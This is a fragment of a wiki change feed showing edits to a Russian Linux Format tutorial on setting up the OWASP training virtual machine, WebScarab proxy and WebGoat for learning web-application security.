class='diff-marker'&gt;+&lt;/td&gt;&lt;td style=&quot;background: #cfc; color:black; font-size: smaller;&quot;&gt;&lt;div&gt;&lt;ins class=&quot;diffchange diffchange-inline&quot;&gt;За­крой­те от­крыв­шее­ся по умол­чанию ок­но Firefox, за­тем вы­бе­ри­те пункт ме­ню Applications &amp;gt; OWASP &lt;/ins&gt;&amp;gt; &lt;ins class=&quot;diffchange diffchange-inline&quot;&gt;Firefox WTE style &lt;/ins&gt;[&lt;ins class=&quot;diffchange diffchange-inline&quot;&gt;При­ло­жения &lt;/ins&gt;&amp;gt; &lt;ins class=&quot;diffchange diffchange-inline&quot;&gt;OWASP &amp;gt; Firefox WTE&lt;/ins&gt;] &lt;ins class=&quot;diffchange diffchange-inline&quot;&gt;(это по­зво­ля­ет удобнее управ­лять про­кси)&lt;/ins&gt;. На­жми­те &lt;ins class=&quot;diffchange diffchange-inline&quot;&gt;на FoxyProxy спра­ва внизу и из­мените ре­жим &lt;/ins&gt;[&lt;ins class=&quot;diffchange diffchange-inline&quot;&gt;Mode] на Use Proxy “WebScarab” for all URLs [Ис­поль­зо­вать про­кси WebScarab для всех ад­ре­сов&lt;/ins&gt;]. ]]&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td colspan=&quot;2&quot;&gt;&amp;#160;&lt;/td&gt;&lt;td class='diff-marker'&gt;+&lt;/td&gt;&lt;td style=&quot;background: #cfc; color:black; font-size: smaller;&quot;&gt;&lt;div&gt;|[[Файл: LXF159.tut_websec.owa_opt5.jpeg| center |thumb|300px| &lt;ins class=&quot;diffchange diffchange-inline&quot;&gt; &lt;/ins&gt;'''&lt;ins class=&quot;diffchange diffchange-inline&quot;&gt;6 Впе­ред!&lt;/ins&gt;'''&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td colspan=&quot;2&quot;&gt;&amp;#160;&lt;/td&gt;&lt;td class='diff-marker'&gt;+&lt;/td&gt;&lt;td style=&quot;background: #cfc; color:black; font-size: smaller;&quot;&gt;&lt;div&gt;&lt;ins class=&quot;diffchange diffchange-inline&quot;&gt;От­крой­те Firefox и на­бе­ри­те &lt;/ins&gt;в &lt;ins class=&quot;diffchange diffchange-inline&quot;&gt;ад­рес­ной стро­ке http://localhost:8080/WebGoat/attack&lt;/ins&gt;, &lt;ins class=&quot;diffchange diffchange-inline&quot;&gt;и вой­ди­те &lt;/ins&gt;в &lt;ins class=&quot;diffchange diffchange-inline&quot;&gt;сис­те­му с именем поль­зо­ва­те­ля &lt;/ins&gt;и &lt;ins class=&quot;diffchange diffchange-inline&quot;&gt;па­ро­лем guest&lt;/ins&gt;. ]]&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt;&amp;#160;&lt;/td&gt;&lt;td style=&quot;background: #eee; color:black; font-size: smaller;&quot;&gt;&lt;div&gt;|}&lt;/div&gt;&lt;/td&gt;&lt;td class='diff-marker'&gt;&amp;#160;&lt;/td&gt;&lt;td style=&quot;background: #eee; color:black; font-size: smaller;&quot;&gt;&lt;div&gt;|}&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt;&amp;#160;&lt;/td&gt;&lt;td style=&quot;background: #eee; color:black; font-size: smaller;&quot;&gt;&lt;/td&gt;&lt;td class='diff-marker'&gt;&amp;#160;&lt;/td&gt;&lt;td style=&quot;background: #eee; color:black; font-size: smaller;&quot;&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;/table&gt;</summary>
		<author><name>Olkol</name></author>	</entry>

	<entry>
		<id>http://wiki.linuxformat.ru/wiki/index.php?title=LXF159:%D0%A5%D0%B0%D0%BA%D0%B5%D1%80%D0%B0%D0%BC:_C%D0%B0%D0%B9%D1%82_%D0%B2_%D0%B1%D0%B5%D0%B7%D0%BE%D0%BF%D0%B0%D1%81%D0%BD%D0%BE%D1%81%D1%82%D0%B8&amp;diff=18000&amp;oldid=prev</id>
		<title>Olkol: /* Ата­куй­те и раз­ру­шай­те */</title>
		<link rel="alternate" type="text/html" href="http://wiki.linuxformat.ru/wiki/index.php?title=LXF159:%D0%A5%D0%B0%D0%BA%D0%B5%D1%80%D0%B0%D0%BC:_C%D0%B0%D0%B9%D1%82_%D0%B2_%D0%B1%D0%B5%D0%B7%D0%BE%D0%BF%D0%B0%D1%81%D0%BD%D0%BE%D1%81%D1%82%D0%B8&amp;diff=18000&amp;oldid=prev"/>
				<updated>2018-09-25T04:57:45Z</updated>
		
		<summary type="html">&lt;p&gt;‎&lt;span dir=&quot;auto&quot;&gt;&lt;span class=&quot;autocomment&quot;&gt;Ата­куй­те и раз­ру­шай­те&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;table class='diff diff-contentalign-left'&gt;
				&lt;col class='diff-marker' /&gt;
				&lt;col class='diff-content' /&gt;
				&lt;col class='diff-marker' /&gt;
				&lt;col class='diff-content' /&gt;
			&lt;tr valign='top'&gt;
			&lt;td colspan='2' style=&quot;background-color: white; color:black;&quot;&gt;← Предыдущая&lt;/td&gt;
			&lt;td colspan='2' style=&quot;background-color: white; color:black;&quot;&gt;Версия 04:57, 25 сентября 2018&lt;/td&gt;
			&lt;/tr&gt;&lt;tr&gt;&lt;td colspan=&quot;2&quot; class=&quot;diff-lineno&quot;&gt;Строка 58:&lt;/td&gt;
&lt;td colspan=&quot;2&quot; class=&quot;diff-lineno&quot;&gt;Строка 58:&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt;&amp;#160;&lt;/td&gt;&lt;td style=&quot;background: #eee; color:black; font-size: smaller;&quot;&gt;&lt;div&gt;| [[Файл:LXF159.tut_websec.owa_opt1.jpeg | center |thumb|300px|&amp;#160; '''1 Под­го­тов­ка.&amp;gt;'''От­крой­те VirtualBox и на­жми­те New [Соз­дать], за­тем Next [Да­лее]. Вве­ди­те Имя OWASP [Name OWASP], вы­бе­ри­те Linux в ка­че­­ст­ве опе­ра­ци­он­ной сис­те­мы [Operating system] и Linux 2.6 в ка­че­­ст­ве ее ти­па [Type]. В сле­дую­щем окне вы­де­ли­те ей мак­си­маль­но воз­мож­ное ко­ли­че­­ст­во па­мя­ти – в идеа­ле не менее 700 МБ. На­жми­те Next, за­тем вы­бе­ри­те Use Existing Hard Disk [Ис­поль­зо­вать су­ще­ст­вую­щий же­ст­кий диск] и вы­бе­ри­те свой но­вый файл VDI. На­жми­те Next, за­тем Create. ]]&lt;/div&gt;&lt;/td&gt;&lt;td class='diff-marker'&gt;&amp;#160;&lt;/td&gt;&lt;td style=&quot;background: #eee; color:black; font-size: smaller;&quot;&gt;&lt;div&gt;| [[Файл:LXF159.tut_websec.owa_opt1.jpeg | center |thumb|300px|&amp;#160; '''1 Под­го­тов­ка.&amp;gt;'''От­крой­те VirtualBox и на­жми­те New [Соз­дать], за­тем Next [Да­лее]. Вве­ди­те Имя OWASP [Name OWASP], вы­бе­ри­те Linux в ка­че­­ст­ве опе­ра­ци­он­ной сис­те­мы [Operating system] и Linux 2.6 в ка­че­­ст­ве ее ти­па [Type]. В сле­дую­щем окне вы­де­ли­те ей мак­си­маль­но воз­мож­ное ко­ли­че­­ст­во па­мя­ти – в идеа­ле не менее 700 МБ. На­жми­те Next, за­тем вы­бе­ри­те Use Existing Hard Disk [Ис­поль­зо­вать су­ще­ст­вую­щий же­ст­кий диск] и вы­бе­ри­те свой но­вый файл VDI. На­жми­те Next, за­тем Create. ]]&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt;&amp;#160;&lt;/td&gt;&lt;td style=&quot;background: #eee; color:black; font-size: smaller;&quot;&gt;&lt;div&gt;| [[Файл: LXF159.tut_websec.owa_opt3.jpeg | center |thumb|300px|'''2 Вход в сис­те­му.'''&amp;gt;За­пусти­те вир­ту­аль­ную ма­ши­ну. В окне вхо­да в сис­те­му вве­ди­те owasp в ка­че­­ст­ве имени поль­зо­ва­те­ля и па­ро­ля. Вре­мя от вре­мени Ubuntu бу­дет пред­ла­гать вам об­но­вить сис­те­му. Так как мы поль­зу­ем­ся сис­те­мой вре­мен­но, эти со­об­щения мож­но спокойно про­иг­но­ри­ро­вать. ]]&lt;/div&gt;&lt;/td&gt;&lt;td class='diff-marker'&gt;&amp;#160;&lt;/td&gt;&lt;td style=&quot;background: #eee; color:black; font-size: smaller;&quot;&gt;&lt;div&gt;| [[Файл: LXF159.tut_websec.owa_opt3.jpeg | center |thumb|300px|'''2 Вход в сис­те­му.'''&amp;gt;За­пусти­те вир­ту­аль­ную ма­ши­ну. В окне вхо­да в сис­те­му вве­ди­те owasp в ка­че­­ст­ве имени поль­зо­ва­те­ля и па­ро­ля. Вре­мя от вре­мени Ubuntu бу­дет пред­ла­гать вам об­но­вить сис­те­му. Так как мы поль­зу­ем­ся сис­те­мой вре­мен­но, эти со­об­щения мож­но спокойно про­иг­но­ри­ро­вать. ]]&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td colspan=&quot;2&quot;&gt;&amp;#160;&lt;/td&gt;&lt;td class='diff-marker'&gt;+&lt;/td&gt;&lt;td style=&quot;background: #cfc; color:black; font-size: smaller;&quot;&gt;&lt;div&gt;&lt;ins style=&quot;color: red; font-weight: bold; text-decoration: none;&quot;&gt;|-&lt;/ins&gt;&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td colspan=&quot;2&quot;&gt;&amp;#160;&lt;/td&gt;&lt;td class='diff-marker'&gt;+&lt;/td&gt;&lt;td style=&quot;background: #cfc; color:black; font-size: smaller;&quot;&gt;&lt;div&gt;&lt;ins style=&quot;color: red; font-weight: bold; text-decoration: none;&quot;&gt;|[[Файл: LXF159.tut_websec.owa_opt5.jpeg| center |thumb|300px| '''3 Ус­та­нов­ка до­полнений'''.&amp;gt; Зай­ди­те в Devices &amp;gt; Install Guest Additions [Уст­рой­ст­ва &amp;gt; Ус­та­но­вить госте­вые до­полнения]. Ес­ли вы­да­ет­ся со­об­щение об ошиб­ке, мо­жет по­на­до­бить­ся уста­нов­ка па­ке­та virtualbox-guest-additions в основ­ной сис­те­ме. На­жми­те OK для от­кры­тия ав­то­за­пуска, за­тем Run [За­пустить], и вве­ди­те owasp в ка­че­­ст­ве па­ро­ля. По­сле за­вер­шения уста­нов­ки пе­ре­за­пусти­те вир­ту­аль­ную ма­ши­ну. Те­перь мож­но раз­вер­нуть ок­но.&amp;#160; ]]&lt;/ins&gt;&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td colspan=&quot;2&quot;&gt;&amp;#160;&lt;/td&gt;&lt;td class='diff-marker'&gt;+&lt;/td&gt;&lt;td style=&quot;background: #cfc; color:black; font-size: smaller;&quot;&gt;&lt;div&gt;&lt;ins style=&quot;color: red; font-weight: bold; text-decoration: none;&quot;&gt;|[[Файл: LXF159.tut_websec.owa_opt5.jpeg| center |thumb|300px| '''3 Ус­та­нов­ка до­полнений'''.&amp;gt; Зай­ди­те в Devices &amp;gt; Install Guest Additions [Уст­рой­ст­ва &amp;gt; Ус­та­но­вить госте­вые до­полнения]. Ес­ли вы­да­ет­ся со­об­щение об ошиб­ке, мо­жет по­на­до­бить­ся уста­нов­ка па­ке­та virtualbox-guest-additions в основ­ной сис­те­ме. На­жми­те OK для от­кры­тия ав­то­за­пуска, за­тем Run [За­пустить], и вве­ди­те owasp в ка­че­­ст­ве па­ро­ля. По­сле за­вер­шения уста­нов­ки пе­ре­за­пусти­те вир­ту­аль­ную ма­ши­ну. Те­перь мож­но раз­вер­нуть ок­но.&amp;#160; ]]&lt;/ins&gt;&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td colspan=&quot;2&quot;&gt;&amp;#160;&lt;/td&gt;&lt;td class='diff-marker'&gt;+&lt;/td&gt;&lt;td style=&quot;background: #cfc; color:black; font-size: smaller;&quot;&gt;&lt;div&gt;&lt;ins style=&quot;color: red; font-weight: bold; text-decoration: none;&quot;&gt;|-&lt;/ins&gt;&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td colspan=&quot;2&quot;&gt;&amp;#160;&lt;/td&gt;&lt;td class='diff-marker'&gt;+&lt;/td&gt;&lt;td style=&quot;background: #cfc; color:black; font-size: smaller;&quot;&gt;&lt;div&gt;&lt;ins style=&quot;color: red; font-weight: bold; text-decoration: none;&quot;&gt;|[[Файл: LXF159.tut_websec.owa_opt5.jpeg| center |thumb|300px| '''3 Ус­та­нов­ка до­полнений'''.&amp;gt; Зай­ди­те в Devices &amp;gt; Install Guest Additions [Уст­рой­ст­ва &amp;gt; Ус­та­но­вить госте­вые до­полнения]. Ес­ли вы­да­ет­ся со­об­щение об ошиб­ке, мо­жет по­на­до­бить­ся уста­нов­ка па­ке­та virtualbox-guest-additions в основ­ной сис­те­ме. На­жми­те OK для от­кры­тия ав­то­за­пуска, за­тем Run [За­пустить], и вве­ди­те owasp в ка­че­­ст­ве па­ро­ля. По­сле за­вер­шения уста­нов­ки пе­ре­за­пусти­те вир­ту­аль­ную ма­ши­ну. Те­перь мож­но раз­вер­нуть ок­но.&amp;#160; ]]&lt;/ins&gt;&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt;&amp;#160;&lt;/td&gt;&lt;td style=&quot;background: #eee; color:black; font-size: smaller;&quot;&gt;&lt;div&gt;|[[Файл: LXF159.tut_websec.owa_opt5.jpeg| center |thumb|300px| '''3 Ус­та­нов­ка до­полнений'''.&amp;gt; Зай­ди­те в Devices &amp;gt; Install Guest Additions [Уст­рой­ст­ва &amp;gt; Ус­та­но­вить госте­вые до­полнения]. Ес­ли вы­да­ет­ся со­об­щение об ошиб­ке, мо­жет по­на­до­бить­ся уста­нов­ка па­ке­та virtualbox-guest-additions в основ­ной сис­те­ме. На­жми­те OK для от­кры­тия ав­то­за­пуска, за­тем Run [За­пустить], и вве­ди­те owasp в ка­че­­ст­ве па­ро­ля. По­сле за­вер­шения уста­нов­ки пе­ре­за­пусти­те вир­ту­аль­ную ма­ши­ну. Те­перь мож­но раз­вер­нуть ок­но.&amp;#160; ]]&lt;/div&gt;&lt;/td&gt;&lt;td class='diff-marker'&gt;&amp;#160;&lt;/td&gt;&lt;td style=&quot;background: #eee; color:black; font-size: smaller;&quot;&gt;&lt;div&gt;|[[Файл: LXF159.tut_websec.owa_opt5.jpeg| center |thumb|300px| '''3 Ус­та­нов­ка до­полнений'''.&amp;gt; Зай­ди­те в Devices &amp;gt; Install Guest Additions [Уст­рой­ст­ва &amp;gt; Ус­та­но­вить госте­вые до­полнения]. Ес­ли вы­да­ет­ся со­об­щение об ошиб­ке, мо­жет по­на­до­бить­ся уста­нов­ка па­ке­та virtualbox-guest-additions в основ­ной сис­те­ме. На­жми­те OK для от­кры­тия ав­то­за­пуска, за­тем Run [За­пустить], и вве­ди­те owasp в ка­че­­ст­ве па­ро­ля. По­сле за­вер­шения уста­нов­ки пе­ре­за­пусти­те вир­ту­аль­ную ма­ши­ну. Те­перь мож­но раз­вер­нуть ок­но.&amp;#160; ]]&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt;&amp;#160;&lt;/td&gt;&lt;td style=&quot;background: #eee; color:black; font-size: smaller;&quot;&gt;&lt;div&gt;|}&lt;/div&gt;&lt;/td&gt;&lt;td class='diff-marker'&gt;&amp;#160;&lt;/td&gt;&lt;td style=&quot;background: #eee; color:black; font-size: smaller;&quot;&gt;&lt;div&gt;|}&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;/table&gt;</summary>
		<author><name>Olkol</name></author>	</entry>

	</feed>